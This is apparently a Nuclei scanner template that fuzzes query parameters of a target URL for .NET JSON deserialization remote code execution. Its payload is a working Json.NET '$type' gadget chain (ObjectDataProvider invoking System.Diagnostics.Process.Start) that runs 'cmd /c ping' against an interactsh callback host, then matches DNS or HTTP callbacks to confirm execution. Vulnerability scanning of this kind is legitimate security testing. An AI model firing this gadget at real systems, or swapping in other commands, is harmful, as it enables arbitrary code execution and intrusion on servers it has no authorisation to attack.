id: rce-dotnet-jackson

info:
  name: RCE DotNet Jackson
  author: reewardius
  severity: critical
  tags: fuzzing-rce,fuzzing-req
  
http:
  - method: GET
    path:
      - "{{BaseURL}}"
      
    payloads:
      rce:
        - '{ "$type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","MethodName":"Start","MethodParameters":{"$type":"System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","$values":["cmd","/cping {{interactsh-url}}"]},"ObjectInstance":{"$type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}}'
        
    fuzzing:
      - part: query
        mode: multiple
        type: replace
        fuzz:
          - "{{rce}}"
          
    redirects: true
    stop-at-first-match: true
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"